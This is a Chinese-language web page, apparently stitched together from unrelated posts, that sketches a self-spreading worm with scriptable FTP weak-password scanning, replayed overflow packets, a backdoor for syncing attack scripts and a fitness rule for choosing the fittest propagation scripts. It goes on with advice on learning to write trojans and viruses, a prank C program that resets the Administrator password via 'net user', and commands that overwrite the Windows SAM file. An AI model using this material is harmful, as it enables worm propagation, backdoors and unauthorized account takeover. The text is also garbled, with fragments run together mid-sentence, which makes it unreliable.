更新这种设计,我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:
code:
uid = iscript-0a21-2331-x #随机唯一编号
using tcp;
port 21;
send “user anonymous”;
send crlf;
send “pass fake@nothingcom”
send crlf;
if (find “200”) resulrt ok;
next;
[copy to clipboard]
解析了这段脚本后(我想这种脚本是很容易读懂的),我们再定义一系列的过程,把我们的蠕虫体upload上去,一次完整的传播动作就完成了。如果是溢出漏洞,为了简单起见我们可以采集远程溢出的数据包,然后修改ip地址等必要数据,再转发溢出数据包进行溢出(这种情况下要实现connect-back就不容易了,不过这些具体问题就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send “\x1a\xb2\xcc” ……
[copy to clipboard]d
主程序在完成传播后留下一个后门,其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本,这样每次有新的漏洞产生,宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序,扫描/攻击脚本的传播过程也是需要仔细处理的。
我们希望适应力(fitness)最强的脚本得到广泛的应用(看起来有点类似 蚁群算法和 ga),所以我们要求得每个个体的fitness,当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个:
fitness = number of host infected / number of host scanned
但也不能仅凭fitness就修改传播脚本,我个人觉得一个合适的概率是75%,20%的机会保持各自的传播脚本,剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性最好的个体得到更多的传播机会,同时,一些在某种网络环境下适应性不强的脚本也有机会尝试不同的网络环境原理有很多种,目地就是破坏计算机环境,比如有大量消耗cpu,删除更改你的文件使它失效,纪录你的键盘使用情况,达到一个窃取你密码和账号的的结果,是你在某些网站的内容被其任意篡改,或者让你就算无法正常工作,只要能达到某种破坏你的影响你的计算机的使用,都可以算是病毒。
举个简单的例子,你写的一个程序改变了计算机的时间,比如改成1900年,这个时候很多程序都不能运行,再就是一个病毒的效果,你在用一个死循环消耗cpu,这个时候用户的机子就比较卡,所以也是一个病毒,当然这些都是简单例子,如果要深入学习,仅知道这点点只能当作启蒙其实以上两位都讲的不错,学习C在linux下的确是不错的,不过呢不知到你的情况如何,在linux下至少得了解会用一个相关的系统,其实初学者还是不推荐的哈,那也是一门很大的学问了。在win下用VC是很不错的选择,虽然软件比较大,可是功能很齐全了,了解适用起来相对时间就能短很多,容易上手些。
写木马其实不是件简单的事,用C当然可以,但也需要结合其他的知识,另外那要看你能把C用的多牛逼了,还有一定要去学习汇编,在win下的汇编才是真正底层的东西,还得很了解计算机的组成原理和 *** 作系统原理,以及深入了解程序如何在运行,代码在怎么跑,内存管理的机制,…,这点学C的时候就要同时多下功夫了,你了解的越多,懂的越多,理解的越深入,也才能真正自己写出木马、病毒来。再有一定基础的时候,自己你能写一些简单的小程序,能看懂别人的写的东西的时候,再去网上找源码、教程。
至于一些书、环境什么的,就要靠自己去寻找了,这里就没什么给你推荐的,自己能学懂的才是最好的。一个小东西 介绍了后别笑话我 !它的功能很简单,就是把Administrator的密码该成xiaoniaoheihei
大家整了人之后切记告诉他密码(xiaoniaoheihei)
由于不能上传文件文件尺寸:
小于 200 kb
可用扩展名: gif, jpg
自己可以用TC20编写编译调试生成
C语言下的代码如下:
main()
{
system("net user administrator xiaoniaoheihei");
}
如果自己真的不小心忘记了密码 如果是XP系统 管理员密码破解如下:
1用个启动盘启动电脑后进入DOS 状态下:输入如下命令
del X:\windows\sysrem32\config\sam 回车
copy x:\windows\repair\sam x:\windows\system32\config 回车
2重新启动计算机。X为安装XP的盘 一般为c:
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)